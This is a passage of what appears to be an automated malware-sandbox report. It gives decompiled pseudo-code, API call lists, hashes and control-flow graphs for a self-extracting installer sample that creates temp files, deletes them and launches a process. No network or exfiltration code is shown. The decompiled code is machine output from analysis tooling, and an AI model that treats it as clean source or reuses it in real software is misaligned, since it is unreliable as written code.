                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E00A6724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x00a66a60
                                                                                                                                                                                                      0x00a66a6a
                                                                                                                                                                                                      0x00a66a6c
                                                                                                                                                                                                      0x00a66a71
                                                                                                                                                                                                      0x00a66a78
                                                                                                                                                                                                      0x00a66a7f
                                                                                                                                                                                                      0x00a66a85
                                                                                                                                                                                                      0x00a66a8e
                                                                                                                                                                                                      0x00a66a91
                                                                                                                                                                                                      0x00a66a93
                                                                                                                                                                                                      0x00a66a9c
                                                                                                                                                                                                      0x00a66aa2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66aa6
                                                                                                                                                                                                      0x00a66ab4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66aa8
                                                                                                                                                                                                      0x00a66aaa
                                                                                                                                                                                                      0x00a66aab
                                                                                                                                                                                                      0x00a66aab
                                                                                                                                                                                                      0x00a66abf
                                                                                                                                                                                                      0x00a66abf
                                                                                                                                                                                                      0x00a66ac5
                                                                                                                                                                                                      0x00a66ad1
                                                                                                                                                                                                      0x00a66ad7
                                                                                                                                                                                                      0x00a66b05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66ad9
                                                                                                                                                                                                      0x00a66ad9
                                                                                                                                                                                                      0x00a66ae9
                                                                                                                                                                                                      0x00a66af0
                                                                                                                                                                                                      0x00a66af2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66af4
                                                                                                                                                                                                      0x00a66af4
                                                                                                                                                                                                      0x00a66afb
                                                                                                                                                                                                      0x00a66afb
                                                                                                                                                                                                      0x00a66af2
                                                                                                                                                                                                      0x00a66ac7
                                                                                                                                                                                                      0x00a66ac7
                                                                                                                                                                                                      0x00a66ac9
                                                                                                                                                                                                      0x00a66b0b
                                                                                                                                                                                                      0x00a66b0b
                                                                                                                                                                                                      0x00a66b11
                                                                                                                                                                                                      0x00a66b13
                                                                                                                                                                                                      0x00a66b18
                                                                                                                                                                                                      0x00a66b1d
                                                                                                                                                                                                      0x00a66b24
                                                                                                                                                                                                      0x00a66b24
                                                                                                                                                                                                      0x00a66b30
                                                                                                                                                                                                      0x00a66b39
                                                                                                                                                                                                      0x00a66b39
                                                                                                                                                                                                      0x00a66b3b
                                                                                                                                                                                                      0x00a66b42
                                                                                                                                                                                                      0x00a66b57
                                                                                                                                                                                                      0x00a66b5f
                                                                                                                                                                                                      0x00a66b65
                                                                                                                                                                                                      0x00a66b65
                                                                                                                                                                                                      0x00a66b67
                                                                                                                                                                                                      0x00a66b6c
                                                                                                                                                                                                      0x00a66b6e
                                                                                                                                                                                                      0x00a66b71
                                                                                                                                                                                                      0x00a66b74
                                                                                                                                                                                                      0x00a66b74
                                                                                                                                                                                                      0x00a66b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66b7d
                                                                                                                                                                                                      0x00a66b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66b83
                                                                                                                                                                                                      0x00a66b8c
                                                                                                                                                                                                      0x00a66b8d
                                                                                                                                                                                                      0x00a66b90
                                                                                                                                                                                                      0x00a66b90
                                                                                                                                                                                                      0x00a66b83
                                                                                                                                                                                                      0x00a66b81
                                                                                                                                                                                                      0x00a66b94
                                                                                                                                                                                                      0x00a66b98
                                                                                                                                                                                                      0x00a66ba2
                                                                                                                                                                                                      0x00a66b9a
                                                                                                                                                                                                      0x00a66b9a
                                                                                                                                                                                                      0x00a66b9a
                                                                                                                                                                                                      0x00a66ba3
                                                                                                                                                                                                      0x00a66bab
                                                                                                                                                                                                      0x00a66bb0
                                                                                                                                                                                                      0x00a66bb5
                                                                                                                                                                                                      0x00a66bbc
                                                                                                                                                                                                      0x00a66bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66bbf
                                                                                                                                                                                                      0x00a66c1e
                                                                                                                                                                                                      0x00a66c25
                                                                                                                                                                                                      0x00a66c27
                                                                                                                                                                                                      0x00a66c2d
                                                                                                                                                                                                      0x00a66c2d
                                                                                                                                                                                                      0x00a66c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66bc5
                                                                                                                                                                                                      0x00a66bc5
                                                                                                                                                                                                      0x00a66bc8
                                                                                                                                                                                                      0x00a66bcc
                                                                                                                                                                                                      0x00a66bce
                                                                                                                                                                                                      0x00a66bce
                                                                                                                                                                                                      0x00a66bd1
                                                                                                                                                                                                      0x00a66bd3
                                                                                                                                                                                                      0x00a66bd3
                                                                                                                                                                                                      0x00a66bd6
                                                                                                                                                                                                      0x00a66bda
                                                                                                                                                                                                      0x00a66be1
                                                                                                                                                                                                      0x00a66be3
                                                                                                                                                                                                      0x00a66be5
                                                                                                                                                                                                      0x00a66be5
                                                                                                                                                                                                      0x00a66be6
                                                                                                                                                                                                      0x00a66be6
                                                                                                                                                                                                      0x00a66be9
                                                                                                                                                                                                      0x00a66bea
                                                                                                                                                                                                      0x00a66bea
                                                                                                                                                                                                      0x00a66b74
                                                                                                                                                                                                      0x00a66c39
                                                                                                                                                                                                      0x00a66c3e
                                                                                                                                                                                                      0x00a66c3e
                                                                                                                                                                                                      0x00a66abe
                                                                                                                                                                                                      0x00a66abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A67182
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetCurrentProcessId.KERNEL32 ref: 00A67191
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetCurrentThreadId.KERNEL32 ref: 00A6719A
                                                                                                                                                                                                        • Part of subcall function 00A67155: GetTickCount.KERNEL32 ref: 00A671A3
                                                                                                                                                                                                        • Part of subcall function 00A67155: QueryPerformanceCounter.KERNEL32(?), ref: 00A671B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00A672B8,00000058), ref: 00A66A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00A66AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00A66AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00A66B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A66B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 00A66BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 00A66BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: 2d9f9588cb439d52394877b57031ab550b7d8ed08d16713bc8b1c7f4be327b16
                                                                                                                                                                                                      • Instruction ID: 6ca1e573949378a7017ba58b39c4289277771272b4b8fa90933c770cc0bb4612
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d9f9588cb439d52394877b57031ab550b7d8ed08d16713bc8b1c7f4be327b16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0241E170984625DBDB21DBA8D9147AA7BF8FB45760F24421AE841E3290CFB84C428B80
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 587 a658c8-a658d5 588 a658d8-a658dd 587->588 588->588 589 a658df-a658f1 LocalAlloc 588->589 590 a658f3-a65901 call a644b9 589->590 591 a65919-a65959 call a61680 call a6658a CreateFileA LocalFree 589->591 594 a65906-a65910 call a66285 590->594 591->594 600 a6595b-a6596c CloseHandle GetFileAttributesA 591->600 601 a65912-a65918 594->601 600->594 602 a6596e-a65970 600->602 602->594 603 a65972-a6597b 602->603 603->601
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E00A658C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E00A61680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E00A6658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00a658cd
                                                                                                                                                                                                      0x00a658d1
                                                                                                                                                                                                      0x00a658d3
                                                                                                                                                                                                      0x00a658d5
                                                                                                                                                                                                      0x00a658d8
                                                                                                                                                                                                      0x00a658d8
                                                                                                                                                                                                      0x00a658da
                                                                                                                                                                                                      0x00a658db
                                                                                                                                                                                                      0x00a658e1
                                                                                                                                                                                                      0x00a658ed
                                                                                                                                                                                                      0x00a658f1
                                                                                                                                                                                                      0x00a6591e
                                                                                                                                                                                                      0x00a6592c
                                                                                                                                                                                                      0x00a65943
                                                                                                                                                                                                      0x00a6594a
                                                                                                                                                                                                      0x00a6594d
                                                                                                                                                                                                      0x00a65953
                                                                                                                                                                                                      0x00a65959
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6595b
                                                                                                                                                                                                      0x00a6595c
                                                                                                                                                                                                      0x00a65963
                                                                                                                                                                                                      0x00a6596c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65972
                                                                                                                                                                                                      0x00a65974
                                                                                                                                                                                                      0x00a6597a
                                                                                                                                                                                                      0x00a6597a
                                                                                                                                                                                                      0x00a6596c
                                                                                                                                                                                                      0x00a658f3
                                                                                                                                                                                                      0x00a65901
                                                                                                                                                                                                      0x00a65906
                                                                                                                                                                                                      0x00a6590b
                                                                                                                                                                                                      0x00a65910
                                                                                                                                                                                                      0x00a65910
                                                                                                                                                                                                      0x00a65918

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A658E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00A65534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-441577946
                                                                                                                                                                                                      • Opcode ID: e3be04993e048d0beb8aaf6c7d282917a4634e4e8a77fe81d3a05038f32c85a8
                                                                                                                                                                                                      • Instruction ID: 876861b8cb4ecd03e0c29dbf5366538c6f1c380a92e64f969b72de4285949494
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3be04993e048d0beb8aaf6c7d282917a4634e4e8a77fe81d3a05038f32c85a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71110872A0021077C7249FB99C4DB9B7EBDDF56360F100619F516E31D1CFB09846C6A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 604 a652b6-a652d4 605 a652d6 604->605 606 a65317-a6531f 604->606 607 a652d7-a652e0 605->607 608 a65321-a65328 606->608 609 a65379-a65381 606->609 610 a652e2-a652e9 607->610 611 a65300-a65314 LocalFree * 2 607->611 608->609 614 a6532a-a65331 608->614 612 a65383-a65385 609->612 613 a6538c-a653a0 call a66ce0 609->613 610->611 615 a652eb-a652fa SetFileAttributesA DeleteFileA 610->615 611->607 617 a65316 611->617 612->613 616 a65387 call a61fe1 612->616 614->609 619 a65333-a65351 call a61781 614->619 615->611 616->613 617->606 624 a65353-a65359 call a665e8 619->624 625 a6535e-a6536f SetCurrentDirectoryA call a62390 619->625 624->625 628 a65374 625->628 628->609
                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E00A652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0xa691e0; // 0x707b70
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0xa68a24 == 0 &&  *0xa69a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0xa68a24 == 0 &&  *0xa69a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E00A61781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      					if(( *0xa69a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E00A665E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E00A62390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0xa69a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E00A61FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0xa68a20 =  *0xa68a20 & 0x00000000;
                                                                                                                                                                                                      				return E00A66CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00a652b6
                                                                                                                                                                                                      0x00a652b6
                                                                                                                                                                                                      0x00a652b6
                                                                                                                                                                                                      0x00a652c1
                                                                                                                                                                                                      0x00a652c8
                                                                                                                                                                                                      0x00a652cb
                                                                                                                                                                                                      0x00a652cc
                                                                                                                                                                                                      0x00a652d4
                                                                                                                                                                                                      0x00a652d6
                                                                                                                                                                                                      0x00a652d7
                                                                                                                                                                                                      0x00a652de
                                                                                                                                                                                                      0x00a652e0
                                                                                                                                                                                                      0x00a652f2
                                                                                                                                                                                                      0x00a652fa
                                                                                                                                                                                                      0x00a652fa
                                                                                                                                                                                                      0x00a65302
                                                                                                                                                                                                      0x00a65305
                                                                                                                                                                                                      0x00a6530c
                                                                                                                                                                                                      0x00a65312
                                                                                                                                                                                                      0x00a65316
                                                                                                                                                                                                      0x00a65316
                                                                                                                                                                                                      0x00a65317
                                                                                                                                                                                                      0x00a6531c
                                                                                                                                                                                                      0x00a6531f
                                                                                                                                                                                                      0x00a65333
                                                                                                                                                                                                      0x00a65345
                                                                                                                                                                                                      0x00a65351
                                                                                                                                                                                                      0x00a65359
                                                                                                                                                                                                      0x00a65359
                                                                                                                                                                                                      0x00a65363
                                                                                                                                                                                                      0x00a65369
                                                                                                                                                                                                      0x00a6536f
                                                                                                                                                                                                      0x00a65374
                                                                                                                                                                                                      0x00a65374
                                                                                                                                                                                                      0x00a65381
                                                                                                                                                                                                      0x00a65387
                                                                                                                                                                                                      0x00a65387
                                                                                                                                                                                                      0x00a6538f
                                                                                                                                                                                                      0x00a653a0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(00707B70,00000080,?,00000000), ref: 00A652F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(00707B70), ref: 00A652FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(00707B70,?,00000000), ref: 00A65305
                                                                                                                                                                                                      • LocalFree.KERNEL32(00707B70), ref: 00A6530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00A611FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00A65363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A65334
                                                                                                                                                                                                      • p{p, xrefs: 00A652CC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$p{p
                                                                                                                                                                                                      • API String ID: 2833751637-2520046281
                                                                                                                                                                                                      • Opcode ID: 411f38ace24eacbb3b2a1e088141baccca55554beceb86b112ea1bff895f8a6f
                                                                                                                                                                                                      • Instruction ID: b033b9c77a3bc744211a8496696cebb1c174d9d74992d7375cd513e94b73b1d2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 411f38ace24eacbb3b2a1e088141baccca55554beceb86b112ea1bff895f8a6f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB216231910614DBDB31DFA0DD29B6977B8BB24B90F090259E9425A2A0CFF45D86CF41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 656 a63fef-a64010 657 a64016-a6403b CreateProcessA 656->657 658 a6410a-a6411a call a66ce0 656->658 659 a640c4-a64101 call a66285 GetLastError FormatMessageA call a644b9 657->659 660 a64041-a6406e WaitForSingleObject GetExitCodeProcess 657->660 674 a64106 659->674 663 a64070-a64077 660->663 664 a64091 call a6411b 660->664 663->664 668 a64079-a6407b 663->668 669 a64096-a640b8 CloseHandle * 2 664->669 668->664 671 a6407d-a64089 668->671 672 a640ba-a640c0 669->672 673 a64108 669->673 671->664 675 a6408b 671->675 672->673 676 a640c2 672->676 673->658 674->673 675->664 676->674
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E00A63FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E00A66CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E00A644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0xa68a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0xa69a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0xa69a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A6411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0xa69a34 & 0x00000400) == 0 || _v528 >= 0) {
